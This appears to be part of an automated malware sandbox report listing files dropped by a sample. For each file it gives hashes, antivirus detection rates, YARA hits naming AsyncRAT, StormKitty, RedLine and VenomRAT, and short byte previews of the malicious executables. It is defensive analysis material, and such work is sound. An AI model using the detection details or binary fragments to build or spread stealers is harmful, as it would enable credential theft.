                                                                                                                                                                                                                                SHA-512:1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):631296
                                                                                                                                                                                                                                Entropy (8bit):7.5120496811594455
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:22QRXDD1yed0fsU4GSWgOvPESGj4s32xEdRCSHsjAZi96VG6wl:22Q9NXw2/wPOjdGxYADEVU
                                                                                                                                                                                                                                MD5:BED8CDCED2D57BE2BD750F0F59991ECD
                                                                                                                                                                                                                                SHA1:4E2A885B9387FCF040B7EB79892DE2F9FE55BCA4
                                                                                                                                                                                                                                SHA-256:5F628663F71E3BAA55F10E6021597F7860BEF868284EB50B8958169DCBBFF4FD
                                                                                                                                                                                                                                SHA-512:B85990A778C2462D57C3B314270BD1F397749450E75508E1012A14F21661358B98021EFB791F694D9EB05F49B0776EA3FF4C803F842F858DB5669968C477433F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 56%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........g...N..........(L...............................................(p...*..(....*.s ...z.*z.,..{$...,..{$...o......(*...*.s.....%...*.s.....*...*.(....*.(E...*Z.~....~(...o+...(@...*j~'...o+...('...(P...(\...*.s...../...*.(S...*.(-...*~r...p(.....3...r...p(.....4...*rsJ....5...~5.....oK....6...*b~8...,.~8...o......8...*.(....-..*.*.....*..s.....o....(.......P...s....(....tk...(.... ....(....*~r...p(.....J...r...p(.....K...*..(...+.o^...-....(...+oh....K...*J.o....%(....
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):179200
                                                                                                                                                                                                                                Entropy (8bit):5.896878165133799
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:ge8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTWwARE+WpCc:06ewwIwQJ6vKX0c5MlYZ0b27
                                                                                                                                                                                                                                MD5:68FAD5F5F8DE1C290DF5D3754B4AF358
                                                                                                                                                                                                                                SHA1:0028395243F38A03B13726915144B9848E8DA39A
                                                                                                                                                                                                                                SHA-256:DBACC134902EE72D1464D3B61A3518402B7AB54807BB7B7541FC2916C8119E9E
                                                                                                                                                                                                                                SHA-512:CE44611D5C47FDCB979C715352F5050C816D4E5A814B102836856EDE279F774E4709CA48FB95639CA66476CA547176370DA7AFC5185AF066832732DA2C80EE01
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 74%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C................................................................*..*....*..*...r...p*..*....*...*...*...*...*...*...*...*..*...*..6.r...p.o....*....*...*...*...*."..s^...*...>..sf...%.}"...*..*...*..0..........s..........o.....o....*..0..........s..........o.....o....*...sV...*2.o....sR...*...2.o....sL...*....0../.......#..........o.... ....(......(....,..*#........*.N...(....(....o....*".o"...i*...&..lo#...*..".o"...k*...&..lo#...*...0.."..........o......(....,..*.
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):179200
                                                                                                                                                                                                                                Entropy (8bit):5.896878165133799
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:ge8p6ewdOIwQx76vK/bvTv0cU+lL/dMlZZUZ0b2gTWwARE+WpCc:06ewwIwQJ6vKX0c5MlYZ0b27
                                                                                                                                                                                                                                MD5:68FAD5F5F8DE1C290DF5D3754B4AF358
                                                                                                                                                                                                                                SHA1:0028395243F38A03B13726915144B9848E8DA39A
                                                                                                                                                                                                                                SHA-256:DBACC134902EE72D1464D3B61A3518402B7AB54807BB7B7541FC2916C8119E9E
                                                                                                                                                                                                                                SHA-512:CE44611D5C47FDCB979C715352F5050C816D4E5A814B102836856EDE279F774E4709CA48FB95639CA66476CA547176370DA7AFC5185AF066832732DA2C80EE01
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 74%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w.f................................. ........@.. ....................... ............`.................................l...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........C................................................................*..*....*..*...r...p*..*....*...*...*...*...*...*...*...*..*...*..6.r...p.o....*....*...*...*...*."..s^...*...>..sf...%.}"...*..*...*..0..........s..........o.....o....*..0..........s..........o.....o....*...sV...*2.o....sR...*...2.o....sL...*....0../.......#..........o.... ....(......(....,..*#........*.N...(....(....o....*".o"...i*...&..lo#...*..".o"...k*...&..lo#...*...0.."..........o......(....,..*.
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):328192
                                                                                                                                                                                                                                Entropy (8bit):5.78991211597484
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:Cm/Q1Q5Ng68j/svmHC40+XIzFUygWK0tWrcBOvx:Cm/Q6P8j/svm1TXI5tZB
                                                                                                                                                                                                                                MD5:43F955115DFBA87CA3593A18EFD58CEF
                                                                                                                                                                                                                                SHA1:A1CA1FD8976E6A50CA3FE59994DAEB0F8A7F9DE5
                                                                                                                                                                                                                                SHA-256:1D16C42501F0040B2CFCD9E6138DB1311D7ED64C8F7C8F415176065B64F4B674
                                                                                                                                                                                                                                SHA-512:360B070901D19B67FCB70260D54C8A8FE65C5720FE0E0C170F6C71D29999EB95B995EFB1BC3DB6CC2A33989B2CBF44F879E00535F27591184625A62AB2641DCD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 66%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.b.........."...0.................. ... ....@.. .......................`............`.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......t...XZ...........................................................@.o..qw.y.pO r.P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):48640
                                                                                                                                                                                                                                Entropy (8bit):5.555815017949639
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
                                                                                                                                                                                                                                MD5:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                SHA1:FC92BE55DCE55098824E381EDEC2002287BB8042
                                                                                                                                                                                                                                SHA-256:D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
                                                                                                                                                                                                                                SHA-512:7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*VrN%.p~....(o....#...*.s...
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):48640
                                                                                                                                                                                                                                Entropy (8bit):5.555815017949639
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:xuwpFTAY3IQWUe9jqmo2qLPYT87XPUpDKcMRPIXB140bxYEEggal46E4bIAnnMWu:xuwpFTA4/2lgXMMOXbzbxY9ggd6DbIAS
                                                                                                                                                                                                                                MD5:C709136E78750FEB6CB85F99EDA16629
                                                                                                                                                                                                                                SHA1:FC92BE55DCE55098824E381EDEC2002287BB8042
                                                                                                                                                                                                                                SHA-256:D77EE327A52A472BC309A79DB27B82F133C2F7B4DDAE689CC130EBE407752FD3
                                                                                                                                                                                                                                SHA-512:7E92EE4B23E9ECFC97C259F7572DCB818CC6A77DBF02B693F58249926A8ED6C324B5CA641BA0C68DB0B063BF966C8651EB82DE9AA2B46446FEA238FA255F27D6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-e............................N.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H........Y...v.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*VrN%.p~....(o....#...*.s...
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):64512
                                                                                                                                                                                                                                Entropy (8bit):5.821041922848356
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:QhB5LrUwk4XO01VIqREWN6y3TbbhwsJaJcGODpqKmY7:QhB5LrUwk4XVVIqRfTbbh1Jacgz
                                                                                                                                                                                                                                MD5:E52BA92D25281E90AA7F27BD3719951F
                                                                                                                                                                                                                                SHA1:F67B856DBAC5BDD315DCE1DF2738A1B4F88F4F39
                                                                                                                                                                                                                                SHA-256:8215ED905544D217F656B5B226F71798970698EEFA4F24CB48532778D8409BAA
                                                                                                                                                                                                                                SHA-512:96A3E30A0FBE049F69B07155CFE3E1A431FF63E8DABC4BAA13EADA61668EBC4D4171FDAF70FB7FAC4D92FC7E8383FA400DCF11EEAEE98E47511857E30A23F53D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Hb................................. ... ....@.. .......................`............@.................................H...S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........e..h............................................................W......H3.......W......3........./.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(C......*2~.....oD...*.s....%r...po....(h...r...p(....o....o....o....( ... ....(....*.s....%r...po....r...po....%r...po.....o....o....( ...*Vs.........si........*.~"...*..."...*F.(+...~!...o....*&...o.
                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):307712
                                                                                                                                                                                                                                Entropy (8bit):5.0811597359684715
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:ScZqf7D34Tp/0+mAQkyg91Q0gvxiB1fA0PuTVAtkxz+3RkeqiOL2bBOA:ScZqf7DItnTyFiB1fA0GTV8kEML
                                                                                                                                                                                                                                MD5:7081E613321921500B70899FDDB56A4D
                                                                                                                                                                                                                                SHA1:FBB9EF6899FB0EA1999404CCFF08EE61CA8DE11F
                                                                                                                                                                                                                                SHA-256:7C03173D3BD7A27E446D8FE70829B963942F746D933A9EAB4D198D524B45CB68
                                                                                                                                                                                                                                SHA-512:679431A866A9806E967515EB97905D458798D8D9832A6FD57E519B12F5A8A5E8331297331A84C95A43BFCA5953987AE9248638BC084FDA92471540919A76A72C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................4...W.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):238080
                                                                                                                                                                                                                                Entropy (8bit):5.990664364126582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
                                                                                                                                                                                                                                MD5:839B3EFD5782B6FC122855665F3AA202
                                                                                                                                                                                                                                SHA1:067C1B809106A1B9AD1641A9C745D4B83ECE1196
                                                                                                                                                                                                                                SHA-256:91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
                                                                                                                                                                                                                                SHA-512:1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):15088640
                                                                                                                                                                                                                                Entropy (8bit):0.5435640710844427
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:flXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXlXl:
                                                                                                                                                                                                                                MD5:52D46BE6BB8DC6D8FD09925E84A76994
                                                                                                                                                                                                                                SHA1:2639980AA48B17EE9FDC169872703453C8E73DEB
                                                                                                                                                                                                                                SHA-256:03B152B94FC40A782D7E12D58AD1D6B00B1029757811F841F64FDBD4831E694B
                                                                                                                                                                                                                                SHA-512:3EA9EFD5CBD44185EE2709A2CA787E8981FD5DE1C757890F1636C9C79624203ABDB341B9E0075A51733286AEC963043EC2A2AC6651EC9BBA043CDF81B32FD0C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):15088640
                                                                                                                                                                                                                                Entropy (8bit):0.5435640710844427
                                                                                                                                                                                                                                Encrypted:false
